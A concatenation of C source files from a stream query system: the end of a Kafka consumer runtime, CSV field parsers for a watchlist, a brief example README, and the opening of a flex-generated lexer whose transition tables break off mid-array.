	gs_sp_t maxfieldtmp;
	gs_int32_t topic_cnt;

	if ((verbosetmp=get_iface_properties(device,(gs_sp_t)"verbose"))!=0) {
		if (strncmp(verbosetmp,"TRUE",4)==0) {
			verbose=1;
			fprintf(stderr,"VERBOSE ENABLED\n");
		} else {
			fprintf(stderr,"VERBOSE DISABLED\n");
		}
	}
	if ((config_fname=get_iface_properties(device,(gs_sp_t)"kafkaconfig"))==0) {
		print_error((gs_sp_t)"kafka_replay_init::No \"kafkaconfig\" defined");
		exit(0);
	}
	if ((topics_fname=get_iface_properties(device,(gs_sp_t)"kafkatopics"))==0) {
		print_error((gs_sp_t)"kafka_replay_init::No \"kafkatopics\" defined");
		exit(0);
	}
	tempdel=get_iface_properties(device,(gs_sp_t)"csvseparator");
	if (tempdel != 0 ) {
		csvdel = tempdel[0];
		csv_set_delim(csvdel);
	}
	if ((delaytmp=get_iface_properties(device,(gs_sp_t)"startupdelay"))!=0) {
		if (verbose) {
			fprintf(stderr,"Startup delay of %u seconds\n",atoi(delaytmp));
		}
		startupdelay=atoi(delaytmp);
	}
	if ((maxfieldtmp=get_iface_properties(device,(gs_sp_t)"_max_csv_pos"))!=0) {
		max_field_kafka=atoi(maxfieldtmp);
	}
	// set maximum field number to be extracted by csv parser
	csv_set_maxfield(max_field_kafka);

	cur_packet.ptype=PTYPE_CSV;

	char errstr[512];
	// load Kafka configuration from config file
	conf = rd_kafka_conf_new();
	if (read_conf_file(conf, config_fname) < 0) {
		// read_conf_file already printed the specific problem; the config
		// file was explicitly required, so do not continue with defaults
		exit(1);
	}

	// create new Kafka handle using configuration settings
	if (!(rk = rd_kafka_new(RD_KAFKA_CONSUMER, conf, errstr, sizeof(errstr)))) {
		fprintf(stderr, "Unable to create new Kafka consumer: %s\n", errstr);
		exit(1);
	}

	// load topic list from the file and set up a kafka queue to consume them
	rkqu = rd_kafka_queue_new(rk);
	topic_cnt = read_topic_list(rk, rkqu, topic_list, MAX_KAFKA_TOPICS, topics_fname);
	if (topic_cnt < 0) {
		// read_topic_list returns -1 on failure; the old code stored that
		// straight into the unsigned num_topics, defeating the empty check
		fprintf(stderr, "Unable to read list of Kafka topics\n");
		exit(1);
	}
	num_topics = topic_cnt;
	if (!num_topics) {
		fprintf(stderr, "Empty list of Kafka topics\n");
	}
	return 0;
}
/* Pull up to 50000 records from the Kafka consume queue, dispatching each
 * through msg_consume. Returns 0 on a poll timeout or after the batch so the
 * caller can service the FTA message queue. A negative poll result triggers
 * an orderly Kafka teardown followed by an endless message-service loop
 * (this function then never returns). */
static gs_retval_t kafka_process_input()
{
	unsigned cnt = 0;
	static unsigned totalcnt = 0;	/* tuples processed since start, across calls */
	gs_int32_t retval;

	while(cnt < 50000) {	// process up to 50000 tuples at a time
		retval = rd_kafka_consume_callback_queue(rkqu, KAFKA_TIMEOUT, msg_consume, NULL);
		if (retval == 0) return 0;	// got a timeout so service message queue
		if (retval < 0) {
			// tear down kafka
			size_t i = 0;

			// stop consuming from topics
			for (i=0 ; i<num_topics ; ++i) {
				int r = rd_kafka_consume_stop(topic_list[i], 0);
				if (r == -1) {
					// fixed message: was "Enable to stop consuming ..."
					fprintf(stderr, "Unable to stop consuming from topic %s\n", rd_kafka_err2str(rd_kafka_last_error()));
				}
			}

			// destroy queue
			rd_kafka_queue_destroy(rkqu);

			// destroy topics
			for (i=0 ; i<num_topics ; ++i) {
				rd_kafka_topic_destroy(topic_list[i]);
			}

			// destroy Kafka handle
			rd_kafka_destroy(rk);

			// we signal that everything is done
			if (verbose)
				fprintf(stderr,"Done processing, waiting for things to shut down\n");
			rts_fta_done();

			// now just service message queue until we get killed or lose connectivity
			while (1) {
				fta_start_service(0);	// service all waiting messages
				usleep(1000);	// sleep a millisecond
			}
		}
		cnt += retval;
	}
	totalcnt = totalcnt + cnt;
	if (verbose) {
		time_t elapsed = time(NULL) - st_time;
		if (elapsed <= 0)
			elapsed = 1;	// avoid division by zero in the first second
		fprintf(stderr,"Processed %u tuples, rate = %lf tup/sec\n", totalcnt, (double)totalcnt / (double)elapsed);
	}
	return 0;
}
/* Entry point for the Kafka-driven LFTA runtime.
 * Initializes the replay interface and host library, waits out the configured
 * startup delay and the GSHUB start-processing signal (servicing the FTA
 * message queue throughout), then loops forever consuming Kafka records.
 * Never returns normally; exits the process on error. */
gs_retval_t main_kafka(gs_int32_t devicenum, gs_sp_t device, gs_int32_t mapcnt, gs_sp_t map[]) {
	gs_uint32_t cont;
	endpoint mygshub;
	dev = device;
	kafka_replay_init(device);
	/* initialize host_lib */
	if (verbose) {
		fprintf(stderr,"Init LFTAs for %s\n",device);
	}
	if (hostlib_init(LFTA,0,devicenum,mapcnt,map) < 0) {
		fprintf(stderr,"%s::error:could not initiate host lib for clearinghouse\n",
			device);
		exit(7);
	}
	fta_init(device); /* XXX fta_init() provides no error code we could check */
	// set maximum field number to be extracted by csv parser
	csv_set_maxfield(max_field_kafka);
	/* service the message queue until the startup delay expires */
	cont = startupdelay + time(0);
	if (verbose) { fprintf(stderr,"Start startup delay"); }
	while (cont > time(NULL)) {
		if (fta_start_service(0) < 0) {
			fprintf(stderr,"%s::error:in processing the msg queue\n", device);
			exit(9);
		}
		usleep(1000); /* sleep for one millisecond */
	}
	if (verbose) { fprintf(stderr,"... Done\n"); }
	// wait to process till we get the signal from GSHUB
	if (get_hub(&mygshub) != 0) {
		print_error((gs_sp_t)"ERROR:could not find gshub for data source");
		exit(0);
	}
	while(get_startprocessing(mygshub,get_instance_name(),0) != 0) {
		usleep(100);
		if (fta_start_service(0) < 0) {
			fprintf(stderr,"%s::error:in processing the msg queue\n", device);
			exit(9);
		}
	}
	/* now we enter an endless loop to process data */
	if (verbose) {
		fprintf(stderr,"Start processing %s\n",device);
	}
	st_time = time(NULL);	/* baseline for the tuple-rate report */
	while (1) {
		if (kafka_process_input() < 0) {
			fprintf(stderr,"%s::error:in processing records\n", device);
			exit(8);
		}
		/* process all messages on the message queue*/
		if (fta_start_service(0) < 0) {
			fprintf(stderr,"%s::error:in processing the msg queue\n", device);
			exit(9);
		}
	}
	return 0;
}
#else
// This is a stub entry point to ensure proper linking when Kafka support is not enabled
/* Stub used when KAFKA_ENABLED is not defined: fail loudly rather than
 * run a source that can never produce input. */
gs_retval_t main_kafka(gs_int32_t devicenum, gs_sp_t device, gs_int32_t mapcnt, gs_sp_t map[]) {
	fprintf(stderr,"ERROR: runtime built without Kafka support.\n");
	exit(1);
	return 0;	/* unreachable; satisfies the declared return type */
}
#endif // KAFKA_ENABLED
<file_sep>#ifndef __WATCHLIST_H_DEFINED__
#define __WATCHLIST_H_DEFINED__
/* Parse a base-10 unsigned integer from CSV field p into *t. Always returns 0. */
static inline gs_retval_t wl_csv_uint(char *p, gs_uint32_t *t)
{
	unsigned long parsed = strtoul((const char*)p, NULL, 10);
	*t = (gs_uint32_t)parsed;
	return 0;
}
/* Parse a base-10 unsigned 64-bit integer from CSV field p into *t. Always returns 0. */
static inline gs_retval_t wl_csv_ullong(char *p, gs_uint64_t *t)
{
	unsigned long long parsed = strtoull((const char*)p, NULL, 10);
	*t = (gs_uint64_t)parsed;
	return 0;
}
/* Parse a dotted-quad IPv4 address from CSV field p into *t as a
 * host-order 32-bit value (first octet in the high byte). Always returns 0. */
static inline gs_retval_t wl_csv_ip(char *p, gs_uint32_t *t)
{
	unsigned o1, o2, o3, o4;
	sscanf((const char*) p,"%u.%u.%u.%u",&o1,&o2,&o3,&o4);
	*t = (o1 << 24) | (o2 << 16) | (o3 << 8) | o4;
	return 0;
}
/* Parse a fully-expanded colon-separated IPv6 address (8 hex groups) from
 * CSV field p into t->v: each pair of 16-bit groups is packed into one
 * 32-bit word and stored in network byte order. Always returns 0. */
static inline gs_retval_t wl_csv_ipv6(char *p, struct ipv6_str *t)
{
	gs_uint32_t v[8];
	gs_uint32_t g;
	sscanf((const char*) p,"%x:%x:%x:%x:%x:%x:%x:%x",&v[0],&v[1],&v[2],&v[3],&v[4],&v[5],&v[6],&v[7]);
	for (g = 0; g < 4; g++)
		t->v[g] = htonl((v[2*g] << 16) | v[2*g+1]);
	return 0;
}
/* Copy CSV field p into the gs_string t (heap-duplicated buffer).
 * Always returns 0. */
static inline gs_retval_t wl_csv_string(char *p, struct gs_string * t)
{
	size_t n = strlen(p);
	t->length = n;
	t->data = (gs_sp_t)strndup(p, n);
	t->owner = (struct FTA *)1;	/* non-NULL sentinel; presumably marks the copy as owned — confirm against gs_string consumers */
	return 0;
}
/* Parse a boolean from CSV field p into *t: exactly the 4-character,
 * case-insensitive token "TRUE" yields 1, anything else yields 0.
 * Always returns 0. */
static inline gs_retval_t wl_csv_bool(char *p, gs_uint32_t *t)
{
	const char *s = (const char*)p;
	*t = (strlen(s) == 4 && strncasecmp("TRUE", s, 4) == 0) ? 1 : 0;
	return 0;
}
/* Parse a base-10 signed integer from CSV field p into *t. Always returns 0. */
static inline gs_retval_t wl_csv_int(char *p, gs_int32_t *t)
{
	long parsed = strtol((const char*)p, NULL, 10);
	*t = (gs_int32_t)parsed;
	return 0;
}
/* Parse a base-10 signed 64-bit integer from CSV field p into *t. Always returns 0. */
static inline gs_retval_t wl_csv_llong(char *p, gs_int64_t *t)
{
	long long parsed = strtoll((const char*)p, NULL, 10);
	*t = (gs_int64_t)parsed;
	return 0;
}
/* Parse a floating-point number from CSV field p into *t. Always returns 0. */
static inline gs_retval_t wl_csv_float(char *p, gs_float_t *t)
{
	double parsed = strtod((const char*)p, NULL);
	*t = parsed;
	return 0;
}
#endif
<file_sep>This example demonstrates a query system reading from a file stream.
gen_feed.py creates the file stream by replacing its contents
every second, checking first if the GS-lite instance has finished
processing the file.
The source file is in gdat format, use
../../bin/gdat2ascii example.gdat to see its contents
Additional features demonstrated:
- a reference to an interface set in example.gsql
- the runall script starts up the query system; note the use of gsprintconsole
to start processing
- the killall script ensures that gsprintconsole and gen_feed.py instances
are stopped.
<file_sep>#line 2 "ftalexer.cc"
#line 4 "ftalexer.cc"
#define YY_INT_ALIGNED short int
/* A lexical scanner generated by flex */
#define yy_create_buffer FtaParser_create_buffer
#define yy_delete_buffer FtaParser_delete_buffer
#define yy_flex_debug FtaParser_flex_debug
#define yy_init_buffer FtaParser_init_buffer
#define yy_flush_buffer FtaParser_flush_buffer
#define yy_load_buffer_state FtaParser_load_buffer_state
#define yy_switch_to_buffer FtaParser_switch_to_buffer
#define yyin FtaParserin
#define yyleng FtaParserleng
#define yylex FtaParserlex
#define yylineno FtaParserlineno
#define yyout FtaParserout
#define yyrestart FtaParserrestart
#define yytext FtaParsertext
#define yywrap FtaParserwrap
#define yyalloc FtaParseralloc
#define yyrealloc FtaParserrealloc
#define yyfree FtaParserfree
#define FLEX_SCANNER
#define YY_FLEX_MAJOR_VERSION 2
#define YY_FLEX_MINOR_VERSION 6
#define YY_FLEX_SUBMINOR_VERSION 0
#if YY_FLEX_SUBMINOR_VERSION > 0
#define FLEX_BETA
#endif
/* First, we deal with platform-specific or compiler-specific issues. */
/* begin standard C headers. */
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
/* end standard C headers. */
/* flex integer type definitions */
#ifndef FLEXINT_H
#define FLEXINT_H
/* C99 systems have <inttypes.h>. Non-C99 systems may or may not. */
#if defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L
/* C99 says to define __STDC_LIMIT_MACROS before including stdint.h,
* if you want the limit (max/min) macros for int types.
*/
#ifndef __STDC_LIMIT_MACROS
#define __STDC_LIMIT_MACROS 1
#endif
#include <inttypes.h>
typedef int8_t flex_int8_t;
typedef uint8_t flex_uint8_t;
typedef int16_t flex_int16_t;
typedef uint16_t flex_uint16_t;
typedef int32_t flex_int32_t;
typedef uint32_t flex_uint32_t;
#else
typedef signed char flex_int8_t;
typedef short int flex_int16_t;
typedef int flex_int32_t;
typedef unsigned char flex_uint8_t;
typedef unsigned short int flex_uint16_t;
typedef unsigned int flex_uint32_t;
/* Limits of integral types. */
#ifndef INT8_MIN
#define INT8_MIN (-128)
#endif
#ifndef INT16_MIN
#define INT16_MIN (-32767-1)
#endif
#ifndef INT32_MIN
#define INT32_MIN (-2147483647-1)
#endif
#ifndef INT8_MAX
#define INT8_MAX (127)
#endif
#ifndef INT16_MAX
#define INT16_MAX (32767)
#endif
#ifndef INT32_MAX
#define INT32_MAX (2147483647)
#endif
#ifndef UINT8_MAX
#define UINT8_MAX (255U)
#endif
#ifndef UINT16_MAX
#define UINT16_MAX (65535U)
#endif
#ifndef UINT32_MAX
#define UINT32_MAX (4294967295U)
#endif
#endif /* ! C99 */
#endif /* ! FLEXINT_H */
#ifdef __cplusplus
/* The "const" storage-class-modifier is valid. */
#define YY_USE_CONST
#else /* ! __cplusplus */
/* C99 requires __STDC__ to be defined as 1. */
#if defined (__STDC__)
#define YY_USE_CONST
#endif /* defined (__STDC__) */
#endif /* ! __cplusplus */
#ifdef YY_USE_CONST
#define yyconst const
#else
#define yyconst
#endif
/* Returned upon end-of-file. */
#define YY_NULL 0
/* Promotes a possibly negative, possibly signed char to an unsigned
* integer for use as an array index. If the signed char is negative,
* we want to instead treat it as an 8-bit unsigned char, hence the
* double cast.
*/
#define YY_SC_TO_UI(c) ((unsigned int) (unsigned char) c)
/* Enter a start condition. This macro really ought to take a parameter,
* but we do it the disgusting crufty way forced on us by the ()-less
* definition of BEGIN.
*/
#define BEGIN (yy_start) = 1 + 2 *
/* Translate the current start state into a value that can be later handed
* to BEGIN to return to the state. The YYSTATE alias is for lex
* compatibility.
*/
#define YY_START (((yy_start) - 1) / 2)
#define YYSTATE YY_START
/* Action number for EOF rule of a given start state. */
#define YY_STATE_EOF(state) (YY_END_OF_BUFFER + state + 1)
/* Special action meaning "start processing a new file". */
#define YY_NEW_FILE FtaParserrestart(FtaParserin )
#define YY_END_OF_BUFFER_CHAR 0
/* Size of default input buffer. */
#ifndef YY_BUF_SIZE
#ifdef __ia64__
/* On IA-64, the buffer size is 16k, not 8k.
* Moreover, YY_BUF_SIZE is 2*YY_READ_BUF_SIZE in the general case.
* Ditto for the __ia64__ case accordingly.
*/
#define YY_BUF_SIZE 32768
#else
#define YY_BUF_SIZE 16384
#endif /* __ia64__ */
#endif
/* The state buf must be large enough to hold one state per character in the main buffer.
*/
#define YY_STATE_BUF_SIZE ((YY_BUF_SIZE + 2) * sizeof(yy_state_type))
#ifndef YY_TYPEDEF_YY_BUFFER_STATE
#define YY_TYPEDEF_YY_BUFFER_STATE
typedef struct yy_buffer_state *YY_BUFFER_STATE;
#endif
#ifndef YY_TYPEDEF_YY_SIZE_T
#define YY_TYPEDEF_YY_SIZE_T
typedef size_t yy_size_t;
#endif
extern yy_size_t FtaParserleng;
extern FILE *FtaParserin, *FtaParserout;
#define EOB_ACT_CONTINUE_SCAN 0
#define EOB_ACT_END_OF_FILE 1
#define EOB_ACT_LAST_MATCH 2
#define YY_LESS_LINENO(n)
#define YY_LINENO_REWIND_TO(ptr)
/* Return all but the first "n" matched characters back to the input stream. */
#define yyless(n) \
do \
{ \
/* Undo effects of setting up FtaParsertext. */ \
int yyless_macro_arg = (n); \
YY_LESS_LINENO(yyless_macro_arg);\
*yy_cp = (yy_hold_char); \
YY_RESTORE_YY_MORE_OFFSET \
(yy_c_buf_p) = yy_cp = yy_bp + yyless_macro_arg - YY_MORE_ADJ; \
YY_DO_BEFORE_ACTION; /* set up FtaParsertext again */ \
} \
while ( 0 )
#define unput(c) yyunput( c, (yytext_ptr) )
#ifndef YY_STRUCT_YY_BUFFER_STATE
#define YY_STRUCT_YY_BUFFER_STATE
struct yy_buffer_state
{
FILE *yy_input_file;
char *yy_ch_buf; /* input buffer */
char *yy_buf_pos; /* current position in input buffer */
/* Size of input buffer in bytes, not including room for EOB
* characters.
*/
yy_size_t yy_buf_size;
/* Number of characters read into yy_ch_buf, not including EOB
* characters.
*/
int yy_n_chars;
/* Whether we "own" the buffer - i.e., we know we created it,
* and can realloc() it to grow it, and should free() it to
* delete it.
*/
int yy_is_our_buffer;
/* Whether this is an "interactive" input source; if so, and
* if we're using stdio for input, then we want to use getc()
* instead of fread(), to make sure we stop fetching input after
* each newline.
*/
int yy_is_interactive;
/* Whether we're considered to be at the beginning of a line.
* If so, '^' rules will be active on the next match, otherwise
* not.
*/
int yy_at_bol;
int yy_bs_lineno; /**< The line count. */
int yy_bs_column; /**< The column count. */
/* Whether to try to fill the input buffer when we reach the
* end of it.
*/
int yy_fill_buffer;
int yy_buffer_status;
#define YY_BUFFER_NEW 0
#define YY_BUFFER_NORMAL 1
/* When an EOF's been seen but there's still some text to process
* then we mark the buffer as YY_EOF_PENDING, to indicate that we
* shouldn't try reading from the input source any more. We might
* still have a bunch of tokens to match, though, because of
* possible backing-up.
*
* When we actually see the EOF, we change the status to "new"
* (via FtaParserrestart()), so that the user can continue scanning by
* just pointing FtaParserin at a new input file.
*/
#define YY_BUFFER_EOF_PENDING 2
};
#endif /* !YY_STRUCT_YY_BUFFER_STATE */
/* Stack of input buffers. */
static size_t yy_buffer_stack_top = 0; /**< index of top of stack. */
static size_t yy_buffer_stack_max = 0; /**< capacity of stack. */
static YY_BUFFER_STATE * yy_buffer_stack = 0; /**< Stack as an array. */
/* We provide macros for accessing buffer states in case in the
* future we want to put the buffer states in a more general
* "scanner state".
*
* Returns the top of the stack, or NULL.
*/
#define YY_CURRENT_BUFFER ( (yy_buffer_stack) \
? (yy_buffer_stack)[(yy_buffer_stack_top)] \
: NULL)
/* Same as previous macro, but useful when we know that the buffer stack is not
* NULL or when we need an lvalue. For internal use only.
*/
#define YY_CURRENT_BUFFER_LVALUE (yy_buffer_stack)[(yy_buffer_stack_top)]
/* yy_hold_char holds the character lost when FtaParsertext is formed. */
static char yy_hold_char;
static int yy_n_chars; /* number of characters read into yy_ch_buf */
yy_size_t FtaParserleng;
/* Points to current character in buffer. */
static char *yy_c_buf_p = (char *) 0;
static int yy_init = 0; /* whether we need to initialize */
static int yy_start = 0; /* start state number */
/* Flag which is used to allow FtaParserwrap()'s to do buffer switches
* instead of setting up a fresh FtaParserin. A bit of a hack ...
*/
static int yy_did_buffer_switch_on_eof;
void FtaParserrestart (FILE *input_file );
void FtaParser_switch_to_buffer (YY_BUFFER_STATE new_buffer );
YY_BUFFER_STATE FtaParser_create_buffer (FILE *file,int size );
void FtaParser_delete_buffer (YY_BUFFER_STATE b );
void FtaParser_flush_buffer (YY_BUFFER_STATE b );
void FtaParserpush_buffer_state (YY_BUFFER_STATE new_buffer );
void FtaParserpop_buffer_state (void );
static void FtaParserensure_buffer_stack (void );
static void FtaParser_load_buffer_state (void );
static void FtaParser_init_buffer (YY_BUFFER_STATE b,FILE *file );
#define YY_FLUSH_BUFFER FtaParser_flush_buffer(YY_CURRENT_BUFFER )
YY_BUFFER_STATE FtaParser_scan_buffer (char *base,yy_size_t size );
YY_BUFFER_STATE FtaParser_scan_string (yyconst char *yy_str );
YY_BUFFER_STATE FtaParser_scan_bytes (yyconst char *bytes,yy_size_t len );
void *FtaParseralloc (yy_size_t );
void *FtaParserrealloc (void *,yy_size_t );
void FtaParserfree (void * );
#define yy_new_buffer FtaParser_create_buffer
#define yy_set_interactive(is_interactive) \
{ \
if ( ! YY_CURRENT_BUFFER ){ \
FtaParserensure_buffer_stack (); \
YY_CURRENT_BUFFER_LVALUE = \
FtaParser_create_buffer(FtaParserin,YY_BUF_SIZE ); \
} \
YY_CURRENT_BUFFER_LVALUE->yy_is_interactive = is_interactive; \
}
#define yy_set_bol(at_bol) \
{ \
if ( ! YY_CURRENT_BUFFER ){\
FtaParserensure_buffer_stack (); \
YY_CURRENT_BUFFER_LVALUE = \
FtaParser_create_buffer(FtaParserin,YY_BUF_SIZE ); \
} \
YY_CURRENT_BUFFER_LVALUE->yy_at_bol = at_bol; \
}
#define YY_AT_BOL() (YY_CURRENT_BUFFER_LVALUE->yy_at_bol)
/* Begin user sect3 */
#define FtaParserwrap() (/*CONSTCOND*/1)
#define YY_SKIP_YYWRAP
typedef unsigned char YY_CHAR;
FILE *FtaParserin = (FILE *) 0, *FtaParserout = (FILE *) 0;
typedef int yy_state_type;
extern int FtaParserlineno;
int FtaParserlineno = 1;
extern char *FtaParsertext;
#ifdef yytext_ptr
#undef yytext_ptr
#endif
#define yytext_ptr FtaParsertext
static yy_state_type yy_get_previous_state (void );
static yy_state_type yy_try_NUL_trans (yy_state_type current_state );
static int yy_get_next_buffer (void );
#if defined(__GNUC__) && __GNUC__ >= 3
__attribute__((__noreturn__))
#endif
static void yy_fatal_error (yyconst char msg[] );
/* Done after the current pattern has been matched and before the
* corresponding action - sets up FtaParsertext.
*/
#define YY_DO_BEFORE_ACTION \
(yytext_ptr) = yy_bp; \
(yytext_ptr) -= (yy_more_len); \
FtaParserleng = (size_t) (yy_cp - (yytext_ptr)); \
(yy_hold_char) = *yy_cp; \
*yy_cp = '\0'; \
(yy_c_buf_p) = yy_cp;
#define YY_NUM_RULES 87
#define YY_END_OF_BUFFER 88
/* This struct is not used in this scanner,
but its presence is necessary. */
struct yy_trans_info
{
flex_int32_t yy_verify;
flex_int32_t yy_nxt;
};
static yyconst flex_int16_t yy_accept[692] =
{ 0,
0, 0, 88, 86, 83, 82, 68, 86, 69, 68,
68, 72, 59, 64, 62, 65, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 47, 48, 70, 83, 82, 0, 81, 80,
0, 76, 0, 75, 72, 0, 0, 60, 66, 63,
67, 61, 71, 71, 27, 71, 71, 71, 10, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 28, 71, 28,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 30, 71, 30, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 28,
71, 71, 71, 71, 71, 30, 71, 71, 71, 71,
71, 71, 71, 71, 71, 0, 84, 0, 0, 85,
75, 0, 0, 77, 73, 1, 5, 1, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 52, 71, 71, 71, 71, 71, 41, 71, 71,
71, 71, 71, 71, 71, 71, 71, 7, 71, 6,
71, 29, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 8, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 1, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 0, 79,
0, 78, 74, 71, 71, 71, 71, 71, 20, 71,
71, 71, 71, 71, 71, 71, 11, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 42, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 33, 71, 71,
71, 71, 34, 71, 38, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 9, 71, 71, 71, 39,
71, 71, 71, 18, 18, 71, 71, 71, 71, 71,
71, 71, 71, 71, 35, 71, 71, 71, 71, 71,
46, 71, 71, 71, 71, 71, 71, 36, 71, 71,
71, 71, 71, 49, 71, 71, 71, 32, 71, 71,
71, 71, 71, 71, 71, 18, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 45, 56, 71, 71, 71, 71, 26,
71, 71, 43, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 19, 71, 31, 51, 71, 71,
31, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 3, 71,
71, 71, 71, 71, 71, 71, 71, 71, 40, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 2, 71, 71, 71,
71, 71, 71, 71, 71, 71, 44, 71, 71, 71,
54, 71, 71, 50, 71, 71, 71, 71, 71, 71,
71, 71, 71, 4, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 37, 37, 71, 71,
71, 71, 71, 71, 71, 71, 71, 37, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 12, 71,
71, 71, 13, 71, 71, 71, 57, 22, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 24,
71, 71, 71, 71, 17, 71, 71, 71, 71, 71,
71, 71, 71, 53, 71, 71, 71, 71, 71, 71,
71, 71, 71, 25, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
23, 21, 71, 71, 55, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 16, 71,
71, 15, 71, 71, 71, 71, 14, 71, 71, 58,
0
} ;
static yyconst YY_CHAR yy_ec[256] =
{ 0,
1, 1, 1, 1, 1, 1, 1, 1, 2, 3,
1, 1, 2, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 2, 4, 1, 4, 4, 4, 4, 5, 4,
4, 4, 6, 4, 7, 8, 9, 10, 10, 10,
10, 10, 10, 11, 10, 10, 10, 4, 12, 13,
14, 15, 1, 4, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41,
4, 1, 4, 1, 42, 1, 43, 44, 45, 46,
47, 48, 49, 50, 51, 52, 41, 53, 54, 55,
56, 57, 41, 58, 59, 60, 61, 62, 63, 64,
65, 41, 66, 4, 67, 68, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1
} ;
static yyconst YY_CHAR yy_meta[69] =
{ 0,
1, 1, 2, 1, 1, 1, 1, 1, 1, 3,
3, 1, 1, 1, 1, 3, 3, 3, 3, 3,
3, 3, 3, 3, 3, 3, 3, 3, 3, 3,
3, 3, 3, 3, 3, 3, 3, 3, 3, 3,
3, 3, 3, 3, 3, 3, 3, 3, 3, 3,
3, 3, 3, 3, 3, 3, 3, 3, 3, 3,
3, 3, 3, 3, 3, 1, 1, 1
} ;
/* yy_base[]: per-DFA-state base offset into the packed yy_nxt/yy_chk
 * arrays; the transition for (state, class) lives at yy_base[state]+class
 * when yy_chk confirms ownership.  The sentinel value 815 marks the
 * jam/end-of-buffer base (see the `while (yy_base[...] != 815)` loop).
 * Generated by flex — do not edit by hand. */
static yyconst flex_uint16_t yy_base[697] =
    {   0,
        0,    0,  814,  815,  811,    0,  815,   66,  805,   62,
      802,   66,  815,   65,  815,   67,   55,   30,   63,  790,
        0,   72,   42,   78,   54,   81,  102,   73,   75,   99,
      101,  107,  123,  780,  121,   82,   96,  743,  106,   90,
      749,  763,  750,  757,  118,  747,  102,   84,  119,  752,
      127,  745,  815,  815,  815,  798,    0,  169,  815,  815,
      796,  165,  795,  168,  173,  180,  770,  815,  815,  815,
      815,  815,    0,  777,    0,  773,  748,  744,    0,   67,
      756,  774,  142,  729,  745,  767,  760,  172,  756,  769,
      731,  727,  752,  725,  743,  740,  716,  748,  159,  721,

      754,  754,  725,  733,  738,  741,  705,  710,  712,  731,
      705,  744,  721,  727,  719,  700,  726,  728,  735,  729,
      706,  701,  726,  736,  718,  177,  697,  157,  732,  732,
      719,  710,  702,  713,  708,  722,  681,  693,  706,  680,
      691,  687,  150,  674,  690,  680,  676,  675,  668,  674,
      680,  663,  668,  670,  664,  681,  662,  672,  667,  666,
      159,  675,  657,  669,  657,  711,  815,  212,  710,  815,
      214,  220,  218,  222,  685,  669,    0,  668,  693,  674,
      678,  686,  662,  645,  648,  655,  677,  666,  672,  663,
      669,    0,  636,  641,  658,  632,  668,    0,  640,  670,

      678,  651,  676,  639,  650,  645,  623,    0,  660,    0,
      632,    0,  647,  663,  658,  661,  629,  659,  639,  650,
      645,  621,  617,  649,  650,  647,  634,  642,    0,  644,
      616,  612,  614,  633,  624,  638,  637,  596,  639,  636,
      620,  607,  593,  608,  607,  606,  604,  587,  590,  597,
      583,  588,  580,  589,  592,  578,  588,  593,  588,  584,
      580,  585,  581,  583,  569,  583,  569,  584,  225,  227,
      229,  231,  815,  609,  608,  594,  598,  586,    0,  565,
      568,  558,  588,  596,  596,  594,    0,  566,  581,  554,
      581,  554,  575,  565,  590,  563,  546,  561,    0,  560,

      581,  553,  583,  576,  564,  547,  537,  566,  563,  557,
      555,  530,  528,  570,  561,  570,  549,    0,  551,  538,
      524,  561,    0,  543,    0,  561,  555,  557,  526,  528,
